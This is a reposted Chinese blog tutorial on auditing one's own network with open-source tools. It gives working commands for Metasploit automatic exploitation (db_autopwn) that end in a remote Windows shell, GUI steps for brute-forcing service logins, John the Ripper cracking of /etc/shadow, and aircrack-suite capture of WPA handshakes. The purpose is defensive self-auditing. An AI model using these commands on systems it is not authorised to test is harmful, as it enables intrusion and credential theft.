自己动手进行安全审计 当一回白帽***
自己动手进行安全审计 当一回白帽***
- 摘要:做一次完全的安全审计对于一个企业而言,往往感觉力不从心,或许是安全公司开价过高,或许担心最终的安全审计报告水份过多,本文想从几个方面利用开源软件来做一次比较彻底的安全审计,不能保证每一处都审计到,至少比问起问题时拍脑袋强。
- 标签:安全审计 暴力破解 ***
- Oracle帮您准确洞察各个物流环节
(2)一套***防御系统(IPS)/***监测系统(IDS),发现***行为时自动报警。
(3)一套恶意软件扫描程序,扫描网络中的恶意软件。
(4)对网络和计算机的访问使用密码进行验证,预防无密码直接访问。
(5)一套杀毒软件,或单机版防病毒软件,保证查杀流行病毒。
(2)IPS/IDS配置不当,没有发挥作用或引起负面影响。
(3)保护网络和计算机资源的密码很弱智,如123456。
(4)杀毒软件很久都没有升级了,对最新的病毒无法感知。
(5)你的IT架构中可能存在你还没有发现的其它漏洞。
# ./msfconsole (启动Metasploit)
# load db_sqlite3
#db_create Nmapresults (创建数据库存储扫描结果)
# db_Nmap [target] (扫描目标主机,使用真实的目标主机ip地址替换这里的[target])
# db_autopwn -t -p -e (尝试***默认端口上的服务)
# sessions –l (查看有漏洞的计算机)
# sessions –i 1 (控制有漏洞的计算机,这里的1表示只控制一台)
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
![]() |
图1 |
(2)然后从协议列表中选择一个协议,它支持很多种协议,如pop3、telnet、ftp、VNC、smtp、cisco auth等。
(3)选择一个目标主机,或者输入IP地址。
(4)切换到密码标签页,在用户名输入框处输入一个已知的用户名,如果不知道,可以事先定义好的用户名字典文件进行猜测,不过我不建议你这么做,除非你的时间多的是。然后在密码输入框中输入你猜测的密码,一般用于弱密码监测,通常使用密码字典进行检查,那就在密码列表输入框中指定密码字典文件的位置。
(5)切换到调整标签页,选择登陆尝试次数,注意这里通常不要设置超过5了,因为很多系统已经设置为超过5次登陆失败就锁定用户。
(6)切换到开始标签页,点击开始启动***。如果***成功,会显示一条成功的消息,密码当然也就包括在消息内了。
(2)进入john-1.7.2目录,输入:
unshadow /etc/passwd /etc/shadow > Password.txt
(3)然后
john --show Password.txt
这里使用了--show参数,目的是直接显示出破解的密码,如果不加参数只有打开存储密码的文件john.pot查看了。
(2)***可以模仿企业无线访问点制造一个假的无线访问点(姑且称其为流氓访问点),诱使毫无经验的用户连接到该访问点,进行骗取访问密码。
#airmon-ng stop ath0
#airmon-ng start wifi0
#airodump-ng ath0
#airodump-ng -c 2 --bssid 00:14:6C:61:71:8A -w wpacapture ath0
这里的-C 2指的是信道2,--bssid 00:14:6C:61:71:8A指的是无线访问点的MAC地址,使用它来确定具体破解哪台无线路由器,-w指定捕获wpa握手数据包,捕获到数据包后就要使用字典来进行暴力破解了。
如果成功就是显示一条破解成功的消息,并显示出密码。如果你发现了你的网络密码,那就该重新设置一个新的访问密码了。
0
分享
收藏
![](https://ucenter.51cto.com/images/noavatar_middle.gif)
15篇文章,1W+人气,0粉丝
![](https://ucenter.51cto.com/images/noavatar_middle.gif)
Ctrl+Enter 发布
发布
取消
转载于:https://blog.51cto.com/bestwilling/168108
自己动手进行安全审计 当一回白帽***相关推荐
- c++ 判断数学表达式有效性_高考数学大题如何quot;保分quot;?学霸教你六大绝招!...
高中里有句话,得数学者得高考,此言不虚,清北学生难见数学不足140的,反之,数学140多分的除非特别偏科,大学一般不会差.那么我们怎么"得数学"呢? 针对目前高三的学生:如果你的数 ...
- WinInet + MFC 写vc驿站助手
春节期间,花了好几天的功夫编码与测试,才算勉强release...... 利用WinInet + MFC编写,现在主要讲解一下原理: 备注信息: 论坛测试账号(username: cctry_good ...
- 教你自制超强笔记本水冷散热系统
导读: 版主 UID 80364 精华 0 积分 24151 帖子 3414 阅读权限 100 注册 06-7-21 状态 离线 [推广] 2007年度技术创新大会 教你自制超强笔记本水冷散热系统 用 ...
- 当人说君子动口不动手时怎么回怼_俗话说:“君子动口不动手。”那么到底什么样的人才称得上君子?...
话说有一次,著名京剧大师梅兰芳见到国画大师张大千先生,说:"我是君子,您是小人." 闻听此言,张大千一下子变了脸色,以为自己做了什么影响声誉的事情. 见此情景,梅兰芳不紧不慢地补上 ...
- 当人说君子动口不动手时怎么回怼_故事:君子动口不动手,神人动心不动口,有情有意事后再回报...
故事纯情虚构,却能让阅者动容,人生像孔雀开屏一样的事情无处不在,却还是想要再建一把天梯,攀登到理想的境界.<空间天梯>59 "真的呀,那我可得试试,这个功能可真是太好了,不用担心 ...
- 当人说君子动口不动手时怎么回怼_论文和效益:君子为什么动口不动手?
来源:武际可科学网博客 作者:武际可 北京大学力学系 "君子动口不动手",这话是说当君子与人产生矛盾时,是要讲道理而不能老拳相对.现在,我们要把它用来看看学界的君子们,如果把写论文 ...
- 当人说君子动口不动手时怎么回怼_如何优雅㨃(duǐ)/怼人既彰显气质又㨃(duǐ)/怼得她无话可说?...
首先,宝贝-不要生气,冷静,气大伤身,咱们君子动口不动手,优雅的说的她们哑口无言! 学学鲁迅先生,钱钟书先生,张爱玲女士等文人,他们的怼人段位绝对是神级,真是学习的典范 绝对优雅又气质! 鲁迅先生,素 ...
- 动手做个 AI 机器人,帮我回消息
大家好,我是鱼皮,自从做了知识分享,我的微信就没消停过,平均每天会收到几百个消息,大部分都是学编程的朋友向我咨询编程问题. 但毕竟我只有一个人,没法所有消息都一个个回复,所以也是很愧疚和无力吧:另外我 ...
- 8问 | 别开场面:大咖齐聚DVP,大话白帽与黑客
9月,北京秋高气爽,蓝天白云.受去中心化漏洞平台DVP邀约,<8问>(微信公众:jiaxiaobie)栏目组在工体北路的科技寺做了一期别开场面的访谈. 本次讨论的主题是"去中心化 ...
最新文章
- 如何在域控制器上安装asp.net?
- Shoot the Bullet(ZOJ3229)(有源汇上下界最大流)
- python循环写入csv文件_Python3.5想把抓到的股票信息以循环方式存入到csv文件中怎么做...
- [Unity3D]unity3d5.0简单的调用摄像头
- 温柔又有耐心的男孩最吸引人
- 修改elementUI组件样式无效的多种解决方式
- 当前目标 1614868689
- 读书笔记: 博弈论导论 - 05 - 完整信息的静态博弈 纳什均衡
- [转载]触摸屏网站制作的小细节
- 随笔(3)——智慧医养融合:从智能交互到交互智能
- 数据持久化基础知识——属性列表
- idea导入项目出现乱码
- JAVA游戏死神之谜下载_诸神战纪二-死神之谜BT版
- mysql计算同比和环比的区别_MySQL实践之同比环比
- python数据分析案例实战——融360客户贷款风险预测(信用卡)
- 阿根廷夺冠!梅西圆梦!历届世界杯还有哪些数据看点?
- ZGC学习笔记:ZGC简介和JDK17对ZGC的优化
- unity中使用AO贴图和自发光emission的简单应用
- ffmpeg视频剪切与拼接
- 用python-sklearn做广州房价预测——以此为例说明如何使用python做简单的数据分析
热门文章
- 行转列方法 及 pivot函数使用问题
- SVN上传文件,提示副本:XXX被锁定,请执行“清理”
- linux怎么修改ens33文件,Linux修改网卡ens33为eth0以及centos7下修改动态IP为静态IP地址...
- c语言isnumber函数的使用方法,使用ISNUMBER函数进行判断处理 使用ISNUMBER函数判断...
- Java—面向对象程序设计
- Android TV系列 TV APP分析(二)
- HCIA 子网掩码习题及具体解题步骤
- U-Mail邮件网关提醒:谨防像素图片钓鱼窃密
- <span>标签向右移动
- 全球「数字游民」现状,有人已经72岁了